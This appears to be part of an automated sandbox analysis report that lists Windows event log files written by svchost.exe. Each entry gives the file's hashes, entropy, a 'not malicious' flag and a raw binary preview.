Preview:	ElfChnk.........?...............?............y...{...v.......................................................................bV................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&.......>h..................................................%_..........................]...................*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	78040
Entropy (8bit):	4.115125812182842
Encrypted:	false
SSDEEP:	384:rhNiGQ5XpvVRYBQf5pJiT5pwiT5yY4iT5pBiT5pJk5pbik5pKik5yY5Lbik5p9i1:rSLpBVi7CPqmxVrJG5
MD5:	307202762BC0D629505B043E48EBD8F5
SHA1:	35899D2CEB5E7A18449FD32621BF7293748187C9
SHA-256:	AB64F4FFC75718788AE8855FD52E5C26CBB5EE3A7EC534817FDB600CE25AD52C
SHA-512:	CD9D3D2C5C40527A2828089A2C0129985B02C2665DD4F747ABF1FED5516230ADD7E093D473DC40738D429542E8E1FFC5F9E221406B4282E38F811AAB041CF841
Malicious:	false
Preview:	ElfChnk.'.......+.......'.......+............$..`+..gv,......................................................................O..................X...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................1...............................................................&.......................................**......'...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.322146858454247
Encrypted:	false
SSDEEP:	384:NH6/hDGCyCkCzCRCFC5CdCbCHCQCrlC+C2CV2CfCrUCECZ/C/C/2a22j2EW2z2/5:NH6/d7kNrTgt
MD5:	D8DABE7AC7FE8F2D1CD853002971BB8A
SHA1:	AC6B0F9940C1B3DB1FBC58DE8A95DD252FA73A6A
SHA-256:	DDC0E74C04DFDB71841128067C33E0B5388CC5E93EEA1FDA4ADDFC6CA39FCC77
SHA-512:	A9AF55922FC793B10A17731BC7F83A70E741E695B47249993530612A11D0A41481068A4DFD4B07182F5604A4AE289211D00766B79DB67CC25171D4ECA5A9292A
Malicious:	false
Preview:	ElfChnk.U...............U...................`...h....fyC......................................................................K................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................F..............................&...............................................nw..............iq......................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.475265357832672
Encrypted:	false
SSDEEP:	1536:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGDL+2ubu1ho7t8ckcXWIkFElThsk687vzGe:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGD+
MD5:	605D94FA0C65C59EECEECC2BEB2F61B5
SHA1:	28CA14F5E02A0A0348C4AC4A22BC228390B64F94
SHA-256:	4667182188A73611A09A2F2B7A5E623367634933BE49899E07ED2FFB99142381
SHA-512:	10CC31A6B3F5CC0AF090861E7EC615289DE4AB43E7B612F4F6518D6FEF8CD943E6A0F8A165AB4F6CAD5509575CC0C0D46960940799C95F1C6D6F103B4594EEA6
Malicious:	false
Preview:	ElfChnk.....................................0k...l..C.......................................................................2\x5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................6Y......................................**..............X.j[d.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.46831700157397
Encrypted:	false
SSDEEP:	1536:iyzFyQWsk4cLSKph9YC/cmqbL9tKGjDLSGUpBpJyGBLpANWy+7grnqOjzYC43sU4:iyzFyNsk4cLSKph9YC/cmqb5tKGjDLSo
MD5:	4FEAEE3DA2F7BB1815777105CDF76B8A
SHA1:	EB3F0A4949CE761726B8D7DDF1BD612851DAA1CE
SHA-256:	4EFF3A073B57EEBC98041219E5FF6461751D7744953C04398F401BFDE4592B43
SHA-512:	977F147DE7F6B560794D8B18CD0D048BB4F02A74A0E2CE016B4F05DFD5FF6A321789D053AD5A7A8A44E7FB0829B01B8E72C9796DDFD3D21B7ED393EF347DA46B
Malicious:	false
Preview:	ElfChnk.+.......[.......+.......[...........X]...^...........................................................................m.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F................................................................................................O.......8..&.......AR...6..12...............:......*......+.......^..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.517082344367377
Encrypted:	false
SSDEEP:	384:YjdAhA71d7587RS7a07DL7T7G7z7L7k7OXD7u7y7I717/7u7m727L07E7K72t7Rt:YBAiHEV6koTxbkeQEWi7Di
MD5:	2628D3458E9FBE638FC3A49E317866FA
SHA1:	8DB033ED373F8A837073679CE0F3B5DC1BD7085B
SHA-256:	D2B987B5AC61D1C66CACD6D0492AC4C4C316C9EE94638A0D312803BB9C24FD00
SHA-512:	6C3683E0A8CF261353830E1F2344A59428E55BBCAFE032AF52624FF961F28608C7E64134BBA4764DEB8885D384DFA593325DB889E9D752226FC29885E3520A67
Malicious:	false
Preview:	ElfChnk.....................................po..@q....`....................................................................\.$.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................e4.............../..s...........&................................................L..............e2......................**..H............<R.d.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4230300221826084
Encrypted:	false
SSDEEP:	384:Bhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinf:B6Ovc0S5UyEeDgLpIC4DoA40eW
MD5:	09FF105D11B8BC33F3A9D0296E57D282
SHA1:	1CC795962E55472E7CDFA50EA3E6254E534356EA
SHA-256:	876B33D842DE9261D25CD41B4A2A20382801BEC7DC3DF46999B6A465BFD64FB3
SHA-512:	68CB5854F9E5A193D2575C2524217F83A9A4BDDB1DCE8B3EB14671F925BC8391B074EAC0464B639A41387F8B3BEEE7CF44F70402CC3F8847B85115CAE45BF943
Malicious:	false
Preview:	ElfChnk.........C...............C...........0{..8}..........................................................................1...................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................7x......&...............................................................................6f......w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.773262505715791
Encrypted:	false
SSDEEP:	384:bhGuZumutu4uEu5uOuDuyb2uPu1uVupUupu+R7udu4uEu1u0u8uhuluxuMuxuMuH:b/vI
MD5:	C06B3BF303EBDD17D76D87B596EE5407
SHA1:	BFC46338E3A89112D6D7E1CFF7A9FB5909DE6458
SHA-256:	26AB9FE5730119306B700304DF2B2C11C6E8322F29CAA9AD49CBBA968DD54CD9
SHA-512:	7CBD5FFB770669AC0295C6221E02D24C116F4B72E3D990F60D122B2AED3280075DA5C3DBCA8A5749F5E566920799087D1094ECB31B5937D8B78EFB40BEC0D0A2
Malicious:	false
Preview:	ElfChnk.........T...............T...........@........J......................................................................?..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................vN......................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.2371167268838485
Encrypted:	false
SSDEEP:	384:RhiAeCv4A+yMrAmA1AHA6AbAMAEAFmANA49ALAEAyKiAfAFgAw+AqAFAApjANAil:RCCvudb6KinaWRQJ4+8nEPDh0
MD5:	3F2115642206C3D448781C58F4EE8AF3
SHA1:	1408F4FF05D6887F74B445E296BC9B69163EDDAE
SHA-256:	84EF0FE4C7A64FA8200DEE7E064A658C2BB94A262A6DBD1353CB7EE458DF1684
SHA-512:	C3B530EA9AC3FD03615D91457CB88474254CCC6B53B3737C932690059274ED18552F40836F7CF78B698A650D636A93B72EC8C8E8057921A28CAF3718D18C85CC
Malicious:	false
Preview:	ElfChnk.........................................@....a..........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................5.................................................... ..........&................................$......**..`..............;f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.1631981097466806
Encrypted:	false
SSDEEP:	384:4hKpsdp90mp9b2p9iGp95ep94+p9/Kp9Wqp9tap98Cp9Pp96p9lp9za1p9Dp9Wpb:4cafg0Y
MD5:	CBAE5379AAAD2B6A84714F5CEA39ACFA
SHA1:	A1AC7C71917C9F27EDA9E17CF0CAD78FC07A82E5
SHA-256:	726B1343CDE4D4B7D2558B9B3E86DAD3782983304D0349974FFA7725D40A9D2B
SHA-512:	7A6DF8A6BDF99348719F7005EFD293089BDD9EB93E2801CB7F3F38C77717E1E47D496E7A1D8FA9FED8EC27D28946214B71C7B156A537B40112D4A76E38F968B8
Malicious:	false
Preview:	ElfChnk.........'...............'....................k......................................................................+N.>........................................<...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............E.yrf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.036288214996343
Encrypted:	false
SSDEEP:	384:vhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWB0:vwDoh1V00eB9iVsTBwMjO2
MD5:	80B64057A5C06D0016A06F2D493CF301
SHA1:	452FDD974A9D63E05AC2F9AE4199CFD0C7CDCD62
SHA-256:	5ABDEF24E5D651A400B36F57A109443BC4F1C975FDAEBB512ADE44935C8BEB1A
SHA-512:	4F9E119EDA7FEED0948DABBDE51C9CBD835DB19EE717F3ED6EB99A16240EB351C968F4A8C39E8BCA2124A0E8A1C53AE5CD8A7D7F61748AFDE0574FF675166F43
Malicious:	false
Preview:	ElfChnk.\...............\.......................X...j.......................................................................LU.t.......................................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i..................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.166433348209963
Encrypted:	false
SSDEEP:	384:/hwCCRzCaCkClCzCYC/CyCVCGCMCvCACWCKECQCMCdC:/KF6
MD5:	9AB3073B8BEBBC3C1E9DCB47217C8E27
SHA1:	33477618A675262EFDC74FACE70AE448EE9CAA05
SHA-256:	E19A280A63CB747D2029892A6F0E67D2C83461FF15112067AF24B8B5E136CC30
SHA-512:	58DD3DECA39CBF605861F78EDD27F3F97858581322063E9F7F1169C9F190613A22649289959A525729F503643B5EFDF5C1C20EE43C21B69C9B4468BA0BDAD6F5
Malicious:	false
Preview:	ElfChnk.....................................04..h6............................................................................4................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................+................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	137904
Entropy (8bit):	4.620304944217381
Encrypted:	false
SSDEEP:	384:RhzMOYQNM6dM1MoYFMoYOKIKFKSKBKYKWKOKHxK/4KFKwKZKD4aKdKcKFKcKqKRQ:R5sFPRtF5sFPRtAO
MD5:	EE7B261E1F9728C6507A6DB2DEE42731
SHA1:	7550376E46ABA37E40B679442143EEAD093822FC
SHA-256:	22897A4D7F64F9C95953C63698DC1AEC4E6A8DAECAC4E4DE4717DEA41CF1B670
SHA-512:	F34B55A5D9EC37E776D957F5291AFEF981B2AEFF82B6E5BD294CB36E754B61452E07B2AC7C08D0DBDC6E33C4AC2D8CE8599622D5BC5D14F0A7285185E3975DB6
Malicious:	false
Preview:	ElfChnk..%.......%.......%.......%..........(.......Bd................................................................................................................6...=...........................................................................................................................f...............?...........................m...................M...F........................H......-...........................u...............................................&..........%...........................*..0....%.......t.f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
Category:	dropped
Size (bytes):	79016
Entropy (8bit):	1.8212529602764902
Encrypted:	false
SSDEEP:	384:y3hL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm6UmaUmVAUmRUm4hL6UsE0Z7:gY7L8lY7L8
MD5:	C762F00CE016F844F1F4B0BE70912D59
SHA1:	40D02A12912BC5A4D4A1D94B83978496B8A1272D
SHA-256:	7E2608282A73B6ED703D7D19FE9226D3F0A1A93F7F2A0720B71E231C216BF4E7
SHA-512:	D9ACB46EEDA7B0DF34CA9FB76B17FC2A242310BFB276FD336E18E67FB6CBE85CA349DC1BBA074BFED5A41CDB8ECE27E09793EB52A99EB73612A75EE0FD2B78A0
Malicious:	false
Preview:	ElfFile.....................................................................................................................\>.eElfChnk......................................1..(4..3.L......................................................................Z.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................>-......................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.20412940486325534
Encrypted:	false
SSDEEP:	48:MpVWd8YrP+8QNRBEZWTENO4brBE3oL0w/6y:EhNVaO8ioQw/6y
MD5:	634B132814A7789C13F456C30037EFA7
SHA1:	5F68D06911C7331376E1A8BD141E3BE658C0E404
SHA-256:	4547F08A878F35179A392EFE057ECD0FCBE08EC1712B045146D4C57F16758547
SHA-512:	5864EA04198286B03ABF90FF6ADF189AC6DBA8BC335139C357562641178E873AF91D35C9C6CE9A0E38AD008D71FC6CFA15D249896F0FA4595FA55613AAF7709C
Malicious:	false
Preview:	ElfChnk...............................................d.......................................................................)~................".......................J...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**...............[..g..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9658503180918458
Encrypted:	false
SSDEEP:	384:khHivRiLiakrkEi5iciMiHiQi8ixiBiFioikiFiixFiIMZifiwiLitixgZJiJi/P:kgtxHMa
MD5:	9961A2C4F5AC430AB4FE55D69904E2C9
SHA1:	BA49A1A12A889812148BECC8D5B285AD418D54FE
SHA-256:	EAE8AAB4F398C27A8E7855C8524389EBE4F695B28D2B51E9EA916738D5E579E9
SHA-512:	B7B0B29444E2B9BECCA18B96D5CA3D7098236C9919F7DE59A37405012C19C6B641CD3C1DA7E9E12F454004B93BB022F689125D31E26825929BB9A7D79FEF3199
Malicious:	false
Preview:	ElfChnk.y...............y................... d..0f.....6.....................................................................;.................>,..........................=.......................#.......................................>...........................................................f...............?.......................P.......................M...F...................................................9.......n(...............................................:...............,......................**......y..........a...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.093082662040085
Encrypted:	false
SSDEEP:	768:2/aQLuaIaWaIawa1WaWaMayazarOaLana+a+a1aUawaaaoagala/aLa0ava4aFaD:EL0G
MD5:	48E1C2B4CB34224C2D31E3EAB0970D09
SHA1:	72A9FB3CCF15619D111F51DA0D7B4CB700B89D00
SHA-256:	0BEB9E4E99CEA259E5B0363BC867AD5065359706FC8D7ECF6ED2202FD9AF4DF8
SHA-512:	61701FFE98593DFEA1DBFB77BF2FE4F17DA8C0C474D8D4438EDDFA42BC1E376D1212EDC08072A87CB659DA4198BB91C471277F9B0FDB20DB4AD24D6199CFE3F0
Malicious:	false
Preview:	ElfChnk.........@...............@...............`....X..........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...;...................................**..H...............f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3650161876414235
Encrypted:	false
SSDEEP:	384:2haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJiXJtXJiXJWTXJpXJUXJ4XJ:2Q0yUkNYwD8imLEWTWW1fsg
MD5:	346E087AE87A771402B2E38619AB7B71
SHA1:	4B7EFEA99E401A5E6C0D115E2B27C48778704C13
SHA-256:	82B60B9565D3FDA733EF5B4A6996AD51C08BC604BE6DC184255A8928B1220EE5
SHA-512:	63C3EB568562AD3560924F7830F0ED120CC362A9FC24EA6CCE4B0EC5F90A0BBEF58539C26B5379A5E6D1939BED7D06A92B4A2521775AF2516793F42A289C0E4B
Malicious:	false
Preview:	ElfChnk......................................A...D.....<....................................................................7...................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................6..........C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.335318634068108
Encrypted:	false
SSDEEP:	384:ehRmsmRm1m4mXm9mSmBmStmtmimMmAmAmRmcmxHmEmqmwmHmLmlm9mGmdmpm3mfr:euDcxMmo
MD5:	3B31610BEABB5895A19C346C64C234C6
SHA1:	84316C06991A51AD91C247130B615F0E56CD4D01
SHA-256:	EA4D4D4A4D56D42B0205793B2C9E45A732EA2F8909095BF924C2F4A138DE0404
SHA-512:	2B9784678702654E8FA65456A501F9F6B48ABD575EE58264709A97FFF9C38C26C7A6ED9057278E1A090BBB4BD2F88FBC95E636D9DEE509142B67B4D81FBAB5A1
Malicious:	false
Preview:	ElfChnk......................................'...(..'.D........................................................................R................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................K...........................................%...............&.......................................**.................Hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7112352075765392
Encrypted:	false
SSDEEP:	192:BV7VDiDL/bDiDwTDiDHDiDDDiDSDiD8DiDkDiD0DiDEDiDMDiDMDiDMDiD:BhV2nT2UT272/2+2w2g2w2I2o2A2I2
MD5:	5D63AFB3EA60A7655FF95B4DB1B451E0
SHA1:	B5D236316CC6617071D83D7E1B4367DDA1A889B1
SHA-256:	815D1AE9187ED88319DDCD4F95D544E3B4FC3D12E2BF9A0DFD30441819089010
